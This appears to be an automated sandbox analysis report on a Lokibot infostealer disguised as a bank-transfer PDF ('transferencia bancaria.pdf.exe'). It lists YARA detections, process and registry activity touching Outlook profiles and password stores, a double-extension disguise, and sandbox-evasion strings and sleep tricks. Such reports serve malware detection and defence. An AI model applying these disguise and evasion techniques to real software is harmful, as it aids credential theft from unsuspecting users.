                  Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: Process Memory Space: transferencia bancaria.pdf.exe PID: 1100, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: Process Memory Space: transferencia bancaria.pdf.exe PID: 5228, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeCode function: 0_2_031A3B980_2_031A3B98
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeCode function: 0_2_031AC5F40_2_031AC5F4
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeCode function: 0_2_031A484F0_2_031A484F
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeCode function: 0_2_031AEFD80_2_031AEFD8
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeCode function: 0_2_031AEFC80_2_031AEFC8
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeCode function: 0_2_031A6D230_2_031A6D23
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeCode function: 0_2_031A6CD00_2_031A6CD0
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.291185342.000000000445F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCollins.dll8 vs transferencia bancaria.pdf.exe
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.287796129.00000000033AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWise.dll6 vs transferencia bancaria.pdf.exe
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.295805972.00000000078E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameWise.dll6 vs transferencia bancaria.pdf.exe
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.295985554.0000000007AA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCollins.dll8 vs transferencia bancaria.pdf.exe
                  Source: transferencia bancaria.pdf.exe, 00000000.00000000.249144170.0000000000F42000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameXwux.exe6 vs transferencia bancaria.pdf.exe
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.277771631.0000000003311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWise.dll6 vs transferencia bancaria.pdf.exe
                  Source: transferencia bancaria.pdf.exeBinary or memory string: OriginalFilenameXwux.exe6 vs transferencia bancaria.pdf.exe
                  Source: transferencia bancaria.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: transferencia bancaria.pdf.exeReversingLabs: Detection: 12%
                  Source: transferencia bancaria.pdf.exeVirustotal: Detection: 20%
                  Source: transferencia bancaria.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\transferencia bancaria.pdf.exe C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess created: C:\Users\user\Desktop\transferencia bancaria.pdf.exe C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess created: C:\Users\user\Desktop\transferencia bancaria.pdf.exe C:\Users\user\Desktop\transferencia bancaria.pdf.exeJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\transferencia bancaria.pdf.exe.logJump to behavior
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/3@40/1
                  Source: transferencia bancaria.pdf.exe, 00000001.00000003.276188616.0000000000B77000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: transferencia bancaria.pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                  Source: transferencia bancaria.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: transferencia bancaria.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: transferencia bancaria.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                  Data Obfuscation

                  barindex
                  Source: Yara matchFile source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.transferencia bancaria.pdf.exe.442b890.12.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: transferencia bancaria.pdf.exe PID: 1100, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: transferencia bancaria.pdf.exe PID: 5228, type: MEMORYSTR
                  Source: transferencia bancaria.pdf.exe, Form1.cs.Net Code: QWERTYSDFGHJK System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 0.0.transferencia bancaria.pdf.exe.f40000.0.unpack, Form1.cs.Net Code: QWERTYSDFGHJK System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: transferencia bancaria.pdf.exeStatic PE information: 0xA9237CA5 [Wed Dec 3 11:06:13 2059 UTC]
                  Source: initial sampleStatic PE information: section name: .text entropy: 6.915983824184794

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: Possible double extension: pdf.exeStatic PE information: transferencia bancaria.pdf.exe
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: Yara matchFile source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.289674735.0000000003592000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: transferencia bancaria.pdf.exe PID: 1100, type: MEMORYSTR
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, transferencia bancaria.pdf.exe, 00000000.00000002.289674735.0000000003592000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, transferencia bancaria.pdf.exe, 00000000.00000002.289674735.0000000003592000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe TID: 2372Thread sleep time: -42186s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe TID: 6116Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe TID: 5156Thread sleep time: -300000s >= -30000sJump to behavior
